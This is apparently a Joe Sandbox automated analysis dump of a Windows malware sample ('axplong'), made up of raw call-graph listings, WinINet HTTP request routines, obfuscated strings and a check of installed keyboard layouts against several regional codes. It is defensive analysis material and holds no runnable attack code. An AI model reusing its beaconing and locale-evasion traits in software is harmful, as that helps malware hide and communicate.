b5b4bb __cftof 2 API calls 12099->12100 12101 b5d304 12100->12101 12101->12035 12103 b5683a __cftof 2 API calls 12102->12103 12104 b5f09f __cftof __fassign __freea 12103->12104 12104->12097 12106 b56692 12105->12106 12107 b5667d __cftof __dosmaperr __freea 12105->12107 12106->12107 12109 b59ef9 12106->12109 12107->11995 12110 b59f11 12109->12110 12112 b59f36 12109->12112 12110->12112 12113 b602f8 12110->12113 12112->12107 12115 b60304 12113->12115 12114 b6030c __cftof __dosmaperr 12114->12112 12115->12114 12117 b603ea 12115->12117 12118 b6040c 12117->12118 12119 b60410 __cftof __dosmaperr 12117->12119 12118->12119 12121 b5fb7f 12118->12121 12119->12114 12122 b5fbcc 12121->12122 12123 b5683a __cftof 2 API calls 12122->12123 12126 b5fbdb __cftof 12123->12126 12124 b5d2e9 2 API calls 12124->12126 12125 b5fe7b 12125->12119 12126->12124 12126->12125 12127 b5c4ea GetPEB GetPEB __fassign 12126->12127 12127->12126 12129 b2bdb2 12128->12129 12132 b2c14e shared_ptr 12128->12132 12130 b2bdc6 InternetOpenW InternetConnectA 12129->12130 12129->12132 12131 b2be3d 12130->12131 12133 b2be53 HttpOpenRequestA 12131->12133 12132->12000 12134 b2be71 shared_ptr 12133->12134 12135 b2bf13 HttpSendRequestA 12134->12135 12136 b2bf2b shared_ptr 12135->12136 12137 b2bfb3 InternetReadFile 12136->12137 12138 b2bfda 12137->12138 12460 b39310 12461 b39325 12460->12461 12465 b39363 12460->12465 12462 b3d041 SleepConditionVariableCS 12461->12462 12463 b3932f 12462->12463 12464 b3cff7 RtlWakeAllConditionVariable 12463->12464 12463->12465 12464->12465 12530 b56559 12531 b563f7 __cftof 2 API calls 12530->12531 12532 b5656a 12531->12532 12364 b3b85e 12369 b3b6e5 12364->12369 12366 b3b886 12377 b3b648 12366->12377 12368 b3b89f 12370 b3b6f1 Concurrency::details::_Reschedule_chore 12369->12370 12371 b3b722 12370->12371 12387 b3c5dc 12370->12387 12371->12366 12375 b3b70c __Mtx_unlock 12376 b22ad0 7 API calls 12375->12376 12376->12371 12378 b3b654 Concurrency::details::_Reschedule_chore 12377->12378 12379 b3b6ae 12378->12379 12380 b3c5dc GetSystemTimePreciseAsFileTime 12378->12380 12379->12368 12381 b3b669 12380->12381 12382 b22ad0 7 API calls 12381->12382 12383 b3b66f __Mtx_unlock 12382->12383 12384 b22ad0 7 API calls 12383->12384 12385 b3b68c __Cnd_broadcast 12384->12385 12385->12379 12386 b22ad0 7 API calls 12385->12386 12386->12379 12395 b3c382 12387->12395 12389 b3b706 12390 b22ad0 12389->12390 12391 b22ada 12390->12391 12392 b22adc 12390->12392 12391->12375 12412 b3c19a 12392->12412 12396 b3c3d8 12395->12396 12398 b3c3aa 12395->12398 12396->12398 12401 b3ce9b 12396->12401 12398->12389 12399 b3c42d __Xtime_diff_to_millis2 12399->12398 12400 b3ce9b _xtime_get GetSystemTimePreciseAsFileTime 12399->12400 12400->12399 12402 b3ceaa 12401->12402 12404 b3ceb7 __aulldvrm 12401->12404 12402->12404 12405 b3ce74 12402->12405 12404->12399 12408 b3cb1a 12405->12408 12409 b3cb37 12408->12409 12410 b3cb2b GetSystemTimePreciseAsFileTime 12408->12410 12409->12404 12410->12409 12413 b3c1c2 12412->12413 12414 b3c1a4 12412->12414 12413->12413 12414->12413 12416 b3c1c7 12414->12416 12419 b22aa0 12416->12419 12418 b3c1de std::_Throw_future_error 12418->12414 12433 b3be0f 12419->12433 12421 b22abf 12421->12418 12422 b58aaf __cftof 2 API calls 12423 b56c26 12422->12423 12425 b56c35 12423->12425 12426 b56c43 12423->12426 12424 b22ab4 12424->12421 12424->12422 12427 b56c99 6 API calls 12425->12427 12428 b568bd 2 API calls 12426->12428 12429 b56c3f 12427->12429 12430 b56c5d 12428->12430 12429->12418 12431 b56c99 6 API calls 12430->12431 12432 b56c71 __freea 12430->12432 12431->12432 12432->12418 12436 b3cb61 12433->12436 12437 b3cb6f InitOnceExecuteOnce 12436->12437 12439 b3be22 12436->12439 12437->12439 12439->12424 12346 b27400 12347 b27435 shared_ptr 12346->12347 12348 b2752f shared_ptr 12347->12348 12352 b3d041 12347->12352 12350 b275bd 12350->12348 12356 b3cff7 12350->12356 12353 b3d052 12352->12353 12354 b3d05a 12353->12354 12360 b3d0c9 12353->12360 12354->12350 12358 b3d007 12356->12358 12357 b3d0af 12357->12348 12358->12357 12359 b3d0ab RtlWakeAllConditionVariable 12358->12359 12359->12348 12361 b3d0d7 SleepConditionVariableCS 12360->12361 12363 b3d0f0 12360->12363 12361->12363 12363->12353 12210 b36ae0 12211 b36b10 12210->12211 12214 b346c0 12211->12214 12213 b36b5c Sleep 12213->12211 12217 b346fb 12214->12217 12231 b34d80 shared_ptr 12214->12231 12215 b34e69 shared_ptr 12215->12213 12218 b2bd60 5 API calls 12217->12218 12217->12231 12229 b34753 shared_ptr __dosmaperr 12218->12229 12219 b34f25 shared_ptr 12220 b34fee shared_ptr 12219->12220 12224 b36ab6 12219->12224 12250 b27d00 12220->12250 12222 b34ffd 12256 b282b0 12222->12256 12225 b346c0 13 API calls 12224->12225 12227 b36b5c Sleep 12225->12227 12226 b34a0d 12228 b2bd60 5 API calls 12226->12228 12226->12231 12227->12224 12232 b34a72 shared_ptr 12228->12232 12229->12226 12230 b58979 2 API calls 12229->12230 12230->12226 12231->12215 12242 b265b0 12231->12242 12232->12231 12235 b342a0 12232->12235 12234 b35016 shared_ptr 12234->12213 12236 b342e2 12235->12236 12238 b34556 12236->12238 12240 b34308 shared_ptr 12236->12240 12237 b34520 shared_ptr 12237->12231 12239 b33550 11 API calls 12238->12239 12239->12237 12240->12237 12260 b33550 12240->12260 12243 b2660f 12242->12243 12244 b22280 2 API calls 12243->12244 12245 b26699 shared_ptr 12244->12245 12246 b22280 2 API calls 12245->12246 12247 b26822 shared_ptr 12245->12247 12248 b26727 shared_ptr 12246->12248 12247->12219 12248->12247 12249 b22280 2 API calls 12248->12249 12249->12248 12254 b27d66 shared_ptr __cftof 12250->12254 12251 b27ea3 GetNativeSystemInfo 12252 b27ea7 12251->12252 12253 b27eb8 shared_ptr 12252->12253 12333 b58a81 12252->12333 12253->12222 12254->12251 12254->12252 12254->12253 12257 b28315 shared_ptr __cftof 12256->12257 12258 b28454 GetNativeSystemInfo 12257->12258 12259 b28333 12257->12259 12258->12259 12259->12234 12261 b3358f shared_ptr 12260->12261 12268 b33ab2 shared_ptr std::_Xinvalid_argument 12260->12268 12265 b338f5 shared_ptr __dosmaperr 12261->12265 12261->12268 12271 b2aca0 12261->12271 12262 b58979 2 API calls 12264 b33a8a 12262->12264 12266 b33e52 12264->12266 12264->12268 12269 b33b9d 12264->12269 12265->12262 12265->12268 12291 b32e20 12266->12291 12268->12240 12276 b31dd0 12269->12276 12273 b2adf0 __cftof 12271->12273 12272 b2ae16 shared_ptr 12272->12265 12273->12272 12306 b25500 12273->12306 12275 b2af7e 12280 b31e6b shared_ptr __dosmaperr 12276->12280 12277 b31e78 12279 b2e440 5 API calls 12277->12279 12278 b32936 shared_ptr std::_Xinvalid_argument 12278->12268 12279->12278 12280->12277 12280->12278 12281 b58979 2 API calls 12280->12281 12282 b32265 shared_ptr 12281->12282 12282->12277 12282->12278 12283 b566e7 2 API calls 12282->12283 12284 b3268b shared_ptr __dosmaperr 12283->12284 12284->12278 12285 b58979 2 API calls 12284->12285 12286 b32759 12285->12286 12286->12277 12286->12278 12287 b327d1 12286->12287 12288 b2e440 5 API calls 12287->12288 12289 b32843 12288->12289 12289->12278 12290 b25df0 2 API calls 12289->12290 12290->12278 12292 b32ec5 __cftof 12291->12292 12293 b332f2 InternetCloseHandle InternetCloseHandle 12292->12293 12294 b33331 12293->12294 12295 b2e440 5 API calls 12294->12295 12296 b33423 shared_ptr 12295->12296 12298 b2aca0 2 API calls 12296->12298 12300 b338f5 shared_ptr __dosmaperr 12296->12300 12303 b3351a shared_ptr std::_Xinvalid_argument 12296->12303 12297 b58979 2 API calls 12299 b33a8a 12297->12299 12298->12300 12301 b33e52 12299->12301 12299->12303 12304 b33b9d 12299->12304 12300->12297 12300->12303 12302 b32e20 9 API calls 12301->12302 12302->12303 12303->12268 12305 b31dd0 9 API calls 12304->12305 12305->12303 12307 b25520 12306->12307 12307->12307 12309 b25620 12307->12309 12310 b22280 12307->12310 12309->12275 12313 b22240 12310->12313 12314 b22256 12313->12314 12317 b58667 12314->12317 12320 b57456 12317->12320 12319 b22264 12319->12307 12321 b57496 12320->12321 12325 b5747e __cftof __dosmaperr 12320->12325 12322 b5683a __cftof 2 API calls 12321->12322 12321->12325 12323 b574ae 12322->12323 12326 b57a11 12323->12326 12325->12319 12328 b57a22 12326->12328 12327 b57a31 __cftof __dosmaperr 12327->12325 12328->12327 12329 b57fb5 GetPEB GetPEB 12328->12329 12330 b57c0f GetPEB GetPEB 12328->12330 12331 b57c35 GetPEB GetPEB 12328->12331 12332 b57d83 GetPEB GetPEB 12328->12332 12329->12328 12330->12328 12331->12328 12332->12328 12334 b586d7 2 API calls 12333->12334 12335 b58a9f 12334->12335 12335->12253 12466 b38700 12467 b3875a __cftof 12466->12467 12473 b39ae0 12467->12473 12469 b38784 12470 b3879c 12469->12470 12477 b243b0 12469->12477 12472 b38809 std::_Throw_future_error 12474 b39b15 12473->12474 12483 b22ca0 12474->12483 12476 b39b46 12476->12469 12478 b3be0f InitOnceExecuteOnce 12477->12478 12479 b243ca 12478->12479 12480 b243d1 12479->12480 12481 b56beb 6 API calls 12479->12481 12480->12472 12482 b243e4 12481->12482 12484 b22cdd 12483->12484 12485 b3be0f InitOnceExecuteOnce 12484->12485 12486 b22d06 12485->12486 12487 b22d11 12486->12487 12488 b22d48 12486->12488 12492 b3be27 12486->12492 12487->12476 12499 b22400 12488->12499 12493 b3be33 std::_Throw_future_error 12492->12493 12494 b3bea3 12493->12494 12495 b3be9a 12493->12495 12497 b22aa0 7 API calls 12494->12497 12502 b3bdaf 12495->12502 12498 b3be9f 12497->12498 12498->12488 12520 b3b506 12499->12520 12501 b22432 12503 b3cb61 InitOnceExecuteOnce 12502->12503 12504 b3bdc7 12503->12504 12505 b3bdce 12504->12505 12508 b56beb 12504->12508 12505->12498 12507 b3bdd7 12507->12498 12509 b56bf7 12508->12509 12510 b58aaf __cftof 2 API calls 12509->12510 12511 b56c26 12510->12511 12512 b56c35 12511->12512 12513 b56c43 12511->12513 12514 b56c99 6 API calls 12512->12514 12515 b568bd 2 API calls 12513->12515 12516 b56c3f 12514->12516 12517 b56c5d 12515->12517 12516->12507 12518 b56c99 6 API calls 12517->12518 12519 b56c71 __freea 12517->12519 12518->12519 12519->12507 12521 b3b521 std::_Throw_future_error 12520->12521 12522 b58aaf __cftof 2 API calls 12521->12522 12524 b3b588 __cftof 12521->12524 12523 b3b5cf 12522->12523 12524->12501 12533 b3a140 12534 b3a1c0 12533->12534 12540 b37040 12534->12540 12536 b3a1fc shared_ptr 12537 b3a3ee shared_ptr 12536->12537 12544 b23ea0 12536->12544 12539 b3a3d6 12542 b37081 __cftof __Mtx_init_in_situ 12540->12542 12541 b372b6 12541->12536 12542->12541 12550 b22e80 12542->12550 12545 b23f08 12544->12545 12549 b23ede 12544->12549 12546 b23f18 12545->12546 12593 b22bc0 12545->12593 12546->12539 12549->12539 12551 b22ec6 12550->12551 12555 b22f2f 12550->12555 12552 b3c5dc GetSystemTimePreciseAsFileTime 12551->12552 12553 b22ed2 12552->12553 12556 b22fde 12553->12556 12559 b22edd __Mtx_unlock 12553->12559 12554 b22faf 12554->12541 12555->12554 12562 b3c5dc GetSystemTimePreciseAsFileTime 12555->12562 12557 b3c19a 7 API calls 12556->12557 12558 b22fe4 12557->12558 12560 b3c19a 7 API calls 12558->12560 12559->12555 12559->12558 12561 b22f79 12560->12561 12563 b3c19a 7 API calls 12561->12563 12564 b22f80 __Mtx_unlock 12561->12564 12562->12561 12563->12564 12565 b3c19a 7 API calls 12564->12565 12566 b22f98 __Cnd_broadcast 12564->12566 12565->12566 12566->12554 12567 b3c19a 7 API calls 12566->12567 12568 b22ffc 12567->12568 12569 b3c5dc GetSystemTimePreciseAsFileTime 12568->12569 12579 b23040 shared_ptr __Mtx_unlock 12569->12579 12570 b23185 12571 b3c19a 7 API calls 12570->12571 12572 b2318b 12571->12572 12573 b3c19a 7 API calls 12572->12573 12574 b23191 12573->12574 12575 b3c19a 7 API calls 12574->12575 12581 b23153 __Mtx_unlock 12575->12581 12576 b23167 12576->12541 12577 b3c19a 7 API calls 12578 b2319d 12577->12578 12579->12570 12579->12572 12579->12576 12580 b3c5dc GetSystemTimePreciseAsFileTime 12579->12580 12582 b2311f 12580->12582 12581->12576 12581->12577 12582->12570 12582->12574 12582->12581 12584 b3bc7c 12582->12584 12587 b3baa2 12584->12587 12586 b3bc8c 12586->12582 12588 b3bacc 12587->12588 12589 b3ce9b _xtime_get GetSystemTimePreciseAsFileTime 12588->12589 12591 b3bad4 __Xtime_diff_to_millis2 12588->12591 12590 b3baff __Xtime_diff_to_millis2 12589->12590 12590->12591 12592 b3ce9b _xtime_get GetSystemTimePreciseAsFileTime 12590->12592 12591->12586 12592->12591 12594 b22bce 12593->12594 12600 b3b777 12594->12600 12596 b22c02 12597 b22c09 12596->12597 12606 b22c40 12596->12606 12597->12539 12599 b22c18 std::_Throw_future_error 12601 b3b784 12600->12601 12602 b3b7a3 Concurrency::details::_Reschedule_chore 12600->12602 12609 b3caa7 12601->12609 12602->12596 12604 b3b794 12604->12602 12611 b3b74e 12604->12611 12617 b3b72b 12606->12617 12608 b22c72 shared_ptr 12608->12599 12610 b3cac2 CreateThreadpoolWork 12609->12610 12610->12604 12612 b3b757 Concurrency::details::_Reschedule_chore 12611->12612 12615 b3ccfc 12612->12615 12614 b3b771 12614->12602 12616 b3cd11 TpPostWork 12615->12616 12616->12614 12618 b3b737 12617->12618 12620 b3b747 12617->12620 12618->12620 12621 b3c9a8 12618->12621 12620->12608 12622 b3c9bd TpReleaseWork 12621->12622 12622->12620 12440 b3b7e9 12441 b3b6e5 8 API calls 12440->12441 12443 b3b811 Concurrency::details::_Reschedule_chore 12441->12443 12442 b3b836 12445 b3b648 8 API calls 12442->12445 12443->12442 12447 b3cade 12443->12447 12446 b3b84e 12445->12446 12448 b3cafc 12447->12448 12449 b3caec TpCallbackUnloadDllOnCompletion 12447->12449 12448->12442 12449->12448 12139 b56beb 12140 b56bf7 12139->12140 12141 b58aaf __cftof 2 API calls 12140->12141 12142 b56c26 12141->12142 12143 b56c35 12142->12143 12144 b56c43 12142->12144 12145 b56c99 6 API calls 12143->12145 12151 b568bd 12144->12151 12147 b56c3f 12145->12147 12148 b56c5d 12150 b56c71 __freea 12148->12150 12154 b56c99 12148->12154 12152 b5683a __cftof 2 API calls 12151->12152 12153 b568cf 12152->12153 12153->12148 12155 b56cc4 __cftof 12154->12155 12161 b56ca7 __cftof __dosmaperr 12154->12161 12156 b56d06 CreateFileW 12155->12156 12162 b56cea __cftof __dosmaperr 12155->12162 12157 b56d38 12156->12157 12158 b56d2a 12156->12158 12175 b56d77 12157->12175 12163 b56e01 GetFileType 12158->12163 12161->12150 12162->12150 12164 b56e3c __cftof 12163->12164 12174 b56ed2 __dosmaperr 12163->12174 12165 b56e75 GetFileInformationByHandle 12164->12165 12164->12174 12166 b56e8b 12165->12166 12165->12174 12180 b570c9 12166->12180 12170 b56ea8 12171 b56f71 SystemTimeToTzSpecificLocalTime 12170->12171 12172 b56ebb 12171->12172 12173 b56f71 SystemTimeToTzSpecificLocalTime 12172->12173 12173->12174 12174->12162 12176 b56d85 12175->12176 12177 b56d8a __dosmaperr 12176->12177 12178 b570c9 2 API calls 12176->12178 12177->12162 12179 b56da3 12178->12179 12179->12162 12182 b570df _wcsrchr 12180->12182 12181 b56e97 12190 b56f71 12181->12190 12182->12181 12194 b5b9e4 12182->12194 12184 b57123 12184->12181 12185 b5b9e4 2 API calls 12184->12185 12186 b57134 12185->12186 12186->12181 12187 b5b9e4 2 API calls 12186->12187 12188 b57145 12187->12188 12188->12181 12189 b5b9e4 2 API calls 12188->12189 12189->12181 12191 b56f89 12190->12191 12192 b56fa9 SystemTimeToTzSpecificLocalTime 12191->12192 12193 b56f8f 12191->12193 12192->12193 12193->12170 12196 b5b9f2 12194->12196 12198 b5b9f8 __cftof __dosmaperr 12196->12198 12199 b5ba2d 12196->12199 12197 b5ba28 12197->12184 12198->12184 12200 b5ba57 12199->12200 12203 b5ba3d __cftof __dosmaperr 12199->12203 12201 b5683a __cftof 2 API calls 12200->12201 12200->12203 12204 b5ba81 12201->12204 12202 b5b9a5 GetPEB GetPEB 12202->12204 12203->12197 12204->12202 12204->12203

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 760 b2bd60-b2bdac 761 b2bdb2-b2bdb6 760->761 762 b2c1a1-b2c1c6 call b37f30 760->762 761->762 764 b2bdbc-b2bdc0 761->764 768 b2c1f4-b2c20c 762->768 769 b2c1c8-b2c1d4 762->769 764->762 766 b2bdc6-b2be4f InternetOpenW InternetConnectA call b37870 call b25b20 764->766 792 b2be53-b2be6f HttpOpenRequestA 766->792 793 b2be51 766->793 773 b2c212-b2c21e 768->773 774 b2c158-b2c170 768->774 771 b2c1d6-b2c1e4 769->771 772 b2c1ea-b2c1f1 call b3d593 769->772 771->772 778 b2c26f-b2c274 call b56b9a 771->778 772->768 780 b2c224-b2c232 773->780 781 b2c14e-b2c155 call b3d593 773->781 775 b2c243-b2c25f call b3cf21 774->775 776 b2c176-b2c182 774->776 782 b2c188-b2c196 776->782 783 b2c239-b2c240 call b3d593 776->783 780->778 789 b2c234 780->789 781->774 782->778 791 b2c19c 782->791 783->775 789->781 791->783 798 b2bea0-b2bf0f call b37870 call b25b20 call b37870 call b25b20 792->798 799 b2be71-b2be80 792->799 793->792 812 b2bf13-b2bf29 HttpSendRequestA 798->812 813 b2bf11 798->813 800 b2be82-b2be90 799->800 801 b2be96-b2be9d call b3d593 799->801 800->801 801->798 814 b2bf5a-b2bf82 812->814 815 b2bf2b-b2bf3a 812->815 813->812 818 b2bfb3-b2bfd4 InternetReadFile 814->818 819 b2bf84-b2bf93 814->819 816 b2bf50-b2bf57 call b3d593 815->816 817 b2bf3c-b2bf4a 815->817 816->814 817->816 820 b2bfda 818->820 822 b2bf95-b2bfa3 819->822 823 b2bfa9-b2bfb0 call b3d593 819->823 824 b2bfe0-b2c090 call b54180 820->824 822->823 823->818
                                                                      APIs
                                                                      • InternetOpenW.WININET(00B78D70,00000000,00000000,00000000,00000000), ref: 00B2BDED
                                                                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00B2BE11
                                                                      • HttpOpenRequestA.WININET(?,00000000), ref: 00B2BE5B
                                                                      • HttpSendRequestA.WININET(?,00000000), ref: 00B2BF1A
                                                                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 00B2BFCC
                                                                      • InternetCloseHandle.WININET(?), ref: 00B2C0A7
                                                                      • InternetCloseHandle.WININET(?), ref: 00B2C0AF
                                                                      • InternetCloseHandle.WININET(?), ref: 00B2C0B7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true
                                                                      • Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_b20000_axplong.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                                                                      • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
                                                                      • API String ID: 688256393-332458646
                                                                      • Opcode ID: f83b37a0e2a566443b33617ae690606b96b637eb5516c9929e6f410b31f9dad1
                                                                      • Instruction ID: 05a2d324782847ec7df2170936136c0f6f0af98f8cc13c0142282f71ba263c35
                                                                      • Opcode Fuzzy Hash: f83b37a0e2a566443b33617ae690606b96b637eb5516c9929e6f410b31f9dad1
                                                                      • Instruction Fuzzy Hash: AAB1E4B1A101289BEB24DF28DC85BEEBBE9EF45304F5041E9F50C97291DB719AC0CB95
                                                                      APIs
                                                                        • Part of subcall function 00B37870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00B3795C
                                                                        • Part of subcall function 00B37870: __Cnd_destroy_in_situ.LIBCPMT ref: 00B37968
                                                                        • Part of subcall function 00B37870: __Mtx_destroy_in_situ.LIBCPMT ref: 00B37971
                                                                        • Part of subcall function 00B2BD60: InternetOpenW.WININET(00B78D70,00000000,00000000,00000000,00000000), ref: 00B2BDED
                                                                        • Part of subcall function 00B2BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00B2BE11
                                                                        • Part of subcall function 00B2BD60: HttpOpenRequestA.WININET(?,00000000), ref: 00B2BE5B
                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00B34EA2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true
                                                                      • Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_b20000_axplong.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                                                                      • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
                                                                      • API String ID: 2414744145-1662704651
                                                                      • Opcode ID: 2c63b0b632914a5a1c6ba68679037ca666c41df161787af3b45a4348821f35b0
                                                                      • Instruction ID: d7b8f7be2d483ffab01a43aa52499cb38b26335aa2fc9211bf48ac12ad275c46
                                                                      • Opcode Fuzzy Hash: 2c63b0b632914a5a1c6ba68679037ca666c41df161787af3b45a4348821f35b0
                                                                      • Instruction Fuzzy Hash: A4234671E001589BEB29DB28CD8979DBBF69F95304F6481D8E008A72D2EB359F84CF51

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 915 b25df0-b25eee 921 b25ef0-b25efc 915->921 922 b25f18-b25f25 call b3cf21 915->922 924 b25f0e-b25f15 call b3d593 921->924 925 b25efe-b25f0c 921->925 924->922 925->924 927 b25f26-b260ad call b56b9a call b3e080 call b37f30 * 5 RegOpenKeyExA 925->927 944 b260b3-b26143 call b54020 927->944 945 b26478-b26481 927->945 971 b26466-b26472 944->971 972 b26149-b2614d 944->972 947 b26483-b2648e 945->947 948 b264ae-b264b7 945->948 952 b26490-b2649e 947->952 953 b264a4-b264ab call b3d593 947->953 949 b264e4-b264ed 948->949 950 b264b9-b264c4 948->950 956 b2651a-b26523 949->956 957 b264ef-b264fa 949->957 954 b264c6-b264d4 950->954 955 b264da-b264e1 call b3d593 950->955 952->953 958 b2659e-b265a3 call b56b9a 952->958 953->948 954->955 954->958 955->949 965 b26525-b26530 956->965 966 b2654c-b26555 956->966 962 b26510-b26517 call b3d593 957->962 963 b264fc-b2650a 957->963 962->956 963->958 963->962 975 b26542-b26549 call b3d593 965->975 976 b26532-b26540 965->976 968 b26582-b2659d call b3cf21 966->968 969 b26557-b26566 966->969 978 b26578-b2657f call b3d593 969->978 979 b26568-b26576 969->979 971->945 980 b26153-b26187 RegEnumValueW 972->980 981 b26460 972->981 975->966 976->958 976->975 978->968 979->958 979->978 986 b2644d-b26454 980->986 987 b2618d-b261ad 980->987 981->971 986->980 990 b2645a 986->990 992 b261b0-b261b9 987->992 990->981 992->992 993 b261bb-b2624d call b37c50 call b38090 call b37870 * 2 call b25c60 992->993 993->986
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true
                                                                      • Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_b20000_axplong.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                      • API String ID: 0-3963862150
                                                                      • Opcode ID: 7fc256c93887c9a523322485ab5da2d8f9dddb37adfdc5fa5b5e2713ae63af19
                                                                      • Instruction ID: 9ebc78b9300855c61951f7b742bfa235b006611e99152d19c1143e4beb2f29e7
                                                                      • Opcode Fuzzy Hash: 7fc256c93887c9a523322485ab5da2d8f9dddb37adfdc5fa5b5e2713ae63af19
                                                                      • Instruction Fuzzy Hash: 83E16F71900268ABEB24DF94CC89BDEB7B9EF14304F5042D9E509A7291DB74AFC48F91

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
